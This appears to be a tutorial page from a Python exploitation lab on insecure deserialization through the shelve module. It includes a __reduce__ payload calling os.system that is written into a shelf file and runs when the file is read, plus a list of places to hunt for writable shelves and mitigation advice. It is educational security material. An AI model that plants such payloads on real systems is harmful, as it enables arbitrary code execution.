Insecure Deserialization - Python Shelve

Python-based Vulnerabilities Anatomy

shelve is a built-in Python module that provides persistent storage of Python objects in a dictionary-like interface; Developers can store complex data types without worrying about serialization logic, as shelve handles it automatically behind the scenes.

Internally, shelve leverages the pickle module for serialization. Every time an object is stored, it is serialized into a byte stream using pickle.dumps().

When retrieved, it’s deserialized back into a Python object using pickle.loads(); This design allows any Python object to be stored and restored but this introduces significant risk when handling untrusted data.

For example:

import shelve

# Store data into shelve
with shelve.open('userdata.db') as db:
    db['username'] = 'alice'
    db['is_admin'] = True
    db['settings'] = {'theme': 'dark', 'notifications': True}
    db['score'] = 1250

# Retrieve data from shelve
with shelve.open('userdata.db') as db:
    print(db['username'])
    print(db['is_admin'])
    print(db['settings'])
    print(db['score'])

# Iterate over all keys
with shelve.open('userdata.db') as db:
    for key in db:
        print(f"{key}: {db[key]}")

This example demonstrates how shelve allows storing different Python data types, including nested structures like dictionaries within dictionaries.

It handles serialization and deserialization automatically, requiring no extra logic from the developer. Additionally, it provides a simple way to iterate over all stored keys and retrieve their corresponding values.

Abusing Shelve

We have an application that simply reads and writes data using shelve, without explicitly using pickle. The developer assumes that since they are using a built-in module, it’s safe by default.

For example:

import shelve

with shelve.open('userdata.db') as db:
    print(db['username'])
    print(db['is_admin'])

The application opens the userdata.db file, reads the keys, and prints the stored values. The developer never directly touches pickle.

However, under the hood, shelve uses pickle for serialization and deserialization.

Every time an object is retrieved from the shelf, shelve calls pickle.loads() internally to deserialize the stored byte stream back into a Python object.

Since shelve relies entirely on pickle, any attacker who can write or replace the shelve database file can inject malicious pickle payloads into the file directly. Once the application opens the shelve file and reads any key, the payload will automatically get deserialized and executed, even if the application never explicitly calls pickle.loads().

To exploit this, The attacker creates a malicious shelve file directly, storing a payload that triggers code execution upon deserialization.

import shelve
import os

class Malicious:
    def __reduce__(self):
        return (os.system, ("id",))

with shelve.open('userdata.db', 'n') as db:
    db['username'] = Malicious()
    db['is_admin'] = True

In this code, we simply store an instance of Malicious() directly into the shelve file. Since shelve automatically pickles every value, it will serialize the Malicious object using pickle.dumps().

The malicious __reduce__() method will be embedded into the serialized byte stream.

For more details about this, visit the Insecure Deserialization - Python Pickle page.

After running the attacker’s payload script, the malicious object is successfully stored into the userdata.db file.

We can verify that the file has been created and populated with the injected payload:

PyFu/generic-py-fu/shelve-example » python3 payload.py          
PyFu/generic-py-fu/shelve-example » ls -lah userdata.db 
-rw-rw-r-- 1 hacker hacker 16K Jun 14 12:51 userdata.db

At this stage, the vulnerable application proceeds to read data from the compromised shelve file. Once the key is accessed, shelve automatically deserializes the object using pickle under the hood.

The malicious __reduce__() function is triggered during deserialization, executing arbitrary code:

PyFu/generic-py-fu/shelve-example » python3 shelve-vulnerable.py
uid=1001(hacker) gid=1001(hacker) groups=1001(hacker)
0
True

The first output line shows the result of executing the id command, proving that arbitrary code was successfully executed.

The remaining output corresponds to the printed values of the keys username and is_admin as handled by the vulnerable script.

Running it in the lab

docker compose run --rm generic-py-fu sh -c "cd deserialization/shelve && python3 shelve-write-payload.py && python3 shelve-vulnerable.py"

uid=0(root) gid=0(root) groups=0(root)
0
True

The victim only reads keys from a shelf, but shelve calls pickle.loads under the hood on every read, so opening an attacker-written userdata.db fires the embedded __reduce__ payload before the first key is returned.

Why shelve persistence matters from an offensive security perspective

I treat shelve as a pickle sink wearing a dictionary costume. The developer sees a db['username'] lookup and reasons about it as a key/value store, so they never think to defend it the way they would a pickle.loads. But every read calls pickle.loads under the hood, which means a shelf is a code-execution sink that fires on the first key access, and the people maintaining it usually do not know pickle is involved at all (see Insecure Deserialization - Python Pickle).

What makes this attractive is the indirection of the trust boundary. I do not need to reach a deserialization call directly. I need to reach the file. If I can write or replace the .db file by any means, the application deserializes my payload the next time it opens the shelf, with no network-facing pickle endpoint required.

Where I look for a reachable sink in an assessment:

Shelves backed by shared or world-writable paths, /tmp, an NFS mount, or a directory another lower-privileged service can touch.
Upload or sync features that let me overwrite files in the directory where the shelf lives.
Path traversal write primitives that reach a known shelf filename (see Insecure File Access and Path Traversal in Python).
Session, cache, or preference stores implemented on shelve and keyed by user data.
Multi-tenant or multi-user hosts where one account can write a shelf another account’s privileged process reads.

The audit tell is any shelve.open whose backing file lives somewhere an attacker can influence, regardless of whether the code ever mentions pickle. For defenders the takeaway is that a shelf is only as trustworthy as write access to its file, so attacker-writable storage behind a shelf is remote code execution.

Mitigation

The fix is to recognize that shelve is pickle on disk, so a shelf whose backing file an attacker can write or replace becomes a code-execution sink the moment it is opened. Never back a shelf with attacker-controlled storage or expose one across a trust boundary, use a data-only store such as JSON or a real database for untrusted data, and restrict filesystem permissions so that only the application itself can write the shelf files.

Insecure Deserialization - Python Shelve

Abusing Shelve

Running it in the lab

Why shelve persistence matters from an offensive security perspective

Mitigation

New Python exploitation techniques, from the lab to your inbox